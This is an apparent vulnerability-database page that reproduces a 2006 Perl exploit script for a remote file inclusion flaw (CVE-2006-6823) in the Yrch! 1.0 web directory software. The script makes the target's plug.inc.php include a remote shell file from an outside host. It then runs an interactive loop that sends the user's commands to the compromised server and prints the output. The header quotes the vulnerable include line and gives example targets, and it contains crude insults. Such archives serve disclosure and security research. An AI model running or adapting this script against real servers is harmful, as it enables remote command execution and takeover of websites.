Lucene search
+L

Yrch 1.0 - 'plug.inc.phppath' Remote File Inclusion

🗓️ 27 Dec 2006 00:00:00Reported by DeltahackingTEAMType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 41 Views

Yrch! v1.0 Website Directories Remote File Inclusion Vulnerability plugi

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-6823
29 Dec 200611:00
cve
cvelist
Cvelist
CVE-2006-6823
29 Dec 200611:00
cvelist
euvd
EUVD
EUVD-2006-6806
7 Oct 202500:30
euvd
nvd
NVD
CVE-2006-6823
29 Dec 200611:28
nvd
#!/usr/bin/perl

##########################################################################################################
#                                                                                                        #
# Yrch! v1.0 Hierarchised Website Directories (plug.inc.php)Remote File Include Vulnerability            #
#                                                                                                        #
# Bug Found : DeltahackingTEAM discovery:Dr.Pantagon & Exploitet By Dr.Trojan contact Dr.Trojan[a]DeltaSecurity.ir   #
#                                                                                                        #
# Class:  Remote File Include Vulnerability                                                              #
#                                                                                                        #
# exemplary Exp: http://lashiyane.org/[path]/yrch/plugins/metasearch/plug.inc.php?path=[                 #
#                                                                                                        #
# Remote: Yes                                                                                            #
#                                                                                                        #
# Type:   Highly critical                                                                                #
#                                                                                                        #
# Vulnerable Code:include_once($path."metasearch.class.php");                                            #
#                                                                                                        #
# Download:http://switch.dl.sourceforge.net/sourceforge/yrch/Yrch.v1.0.zip                               #
#                                                                                                        #
# Ptach : www.Advistory.deltasecurity.ir                                                                 #
#                                                                                                        #
# Bug Found : DeltahackingTEAM Exploitet Discovered &Exploitet: Dr.Trojan<Dr.Trojan[A]Deltasecurity.ir   #
#                                                                                                        #
# Exploit: Yrch!.pl                                                                                      #
#                                                                                                        #
# Web Site:www.deltasecurity.ir <0Ur Server(Secure=99/999)www.takserver.ir>                              #
#                                                                                                        #
#SP FUCK.............: z_zer0c00l(floozie Mother Test 100%=z_zer0c00l=misbegotten:D)                     #
##########################################################################################################

use LWP::UserAgent;
use LWP::Simple;

$target = @ARGV[0];
$shellsite = @ARGV[1];
$shellcmd = @ARGV[2];
$file = "plug.inc.php?path=";

if(!$target || !$shellsite)
{
    usage();
}

header();

print "Type 'exit' to quit";
print "[cmd]\$";
$cmd = <STDIN>;

while ($cmd !~ "exit")
{
    $xpl = LWP::UserAgent->new() or die;
        $req =
HTTP::Request->new(GET=>$target.$file.$shellsite.'?&'.$shellcmd.'='.$cmd)
or die("\n\n Failed to connect.");
        $res = $xpl->request($req);
        $r = $res->content;
        $r =~ tr/[\n]/[&#234;]/;

    if (@ARGV[4] eq "-r")
    {
        print $r;
    }
    elsif (@ARGV[5] eq "-p")
    {
    # if not working change cmd variable to null and apply patch manually.
    $cmd = "echo if(basename(__FILE__) == basename(\$_SERVER['PHP_SELF'])) die(); >> list_last.inc";
    print q
    {

    }
    }
    else
    {
    print "[cmd]\$";
    $cmd = <STDIN>;
    }
}

sub header()
{
    print q
    {
#################################################################################
                        Bug Found : DeltahackingTEAM
               Yrch!.pl  - Remote File Include Exploit
            Vulnerability discovered and exploitet by Dr.Trojan&Dr.Pantagon
                          [email protected]
                www.DeltaSecurity.ir &  www.Takserver.ir
#################################################################################
    };
}

sub usage()
{
header();
    print q
    {
########################################################################
Usage:
perl Yrch!.pl  <Target website> <Shell Location> <CMD Variable> <-r> <-p>
<Target Website> - Path to target eg: www.lashiyane.org/yrch/plugins/metasearch
<Shell Location> - Path to shell eg: d4wood.by.ru/cmd.gif
<CMD Variable> - Shell command variable name eg: Pwd
<r> - Show output from shell
<p> - plug.inc.php
Example:
perl Yrch!.pl http://localhost/include http://localhost/s.txt cmd -r -p
########################################################################
    };
exit();
}

# Farzad.SHarifi

# milw0rm.com [2006-12-27]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation